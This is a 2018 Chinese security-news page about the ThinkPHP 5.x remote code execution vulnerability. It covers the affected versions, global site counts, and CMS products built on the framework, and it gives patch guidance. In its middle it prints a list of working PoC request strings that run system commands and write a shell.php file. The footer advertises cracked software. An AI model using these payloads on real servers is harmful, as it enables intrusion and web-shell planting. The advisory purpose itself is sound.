ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全新闻 → ThinkPHP5.x远程代码执行漏洞 基于二次开发内容管理系统接连遭殃

ThinkPHP5.x远程代码执行漏洞 基于二次开发内容管理系统接连遭殃

时间:2018-12-13 00:00:00人气:作者:本站作者我要评论

ThinkPHP5.x远程代码执行漏洞 基于二次开发内容管理系统接连遭殃

2018年12月10日,thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。

此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞,其框架安全性可能会在日后遭受更严峻的考验。据不完全统计,目前全球使用ThinkPHP5及其二次开发系统的网站大概12万。

概况

ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

目前FOFA系统最新数据(一年内数据)显示全球范围内共有 21万个ThinkPHP网站对外开放服务。中国大陆地区使用数量最多,共有113339台,美国第二,共有37011台,中国香港特别行政区第三,共有12262台,新加坡第四,共有3829台。

全球范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)

中国大陆地区浙江省使用用数量最多,共有66163台;北京市第二,共有21416台,广东省第三,共有5431台,上海市第四,共有2863台,河南省第五,共有2629台。

中国大陆范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)

危害等级

严重

漏洞影响

目前漏洞影响版本号包括:

  1. 5.x < 5.1.31
  2. 5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。

AdminLTE后台管理系统
layui后台管理系统
thinkcmf
H-ui.admin后台管理系统
tpshop
FsatAdmin
eyoucms
LarryCMS后台管理系统
tpadmin后台管理系统
snake后台管理系统
ThinkSNS
DolphinPHP后台管理系统
WeMall商城系统
CLTPHP
齐博CMS
DSMALL
YFCMF
HisiPHP后台管理系统
Tplay后台管理系统
lyadmin后台管理系统
haoid后台管理系统

ThinkPHP5远程代码执行漏洞PoC

  1. 5.0.x版本
  2. s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  3. s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
  4. 5.1.x版本
  5. s=index/\think\Request/input&filter=phpinfo&data=1
  6. s=index/\think\Request/input&filter=system&data=id
  7. s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
  8. s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
  9. s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
  10. s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

修复建议

1、官网已发布安全更新,用户可以通过网址http://www.thinkphp.cn/topic/60400.html 获得

2、如暂时无法更新到最新版本,可以按照按官网指示手动修复,网址:https://blog.thinkphp.cn/869075

3、建议使用以上ThinkPHP5 开发的内容管理系统的用户及时检查是否存在该漏洞

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网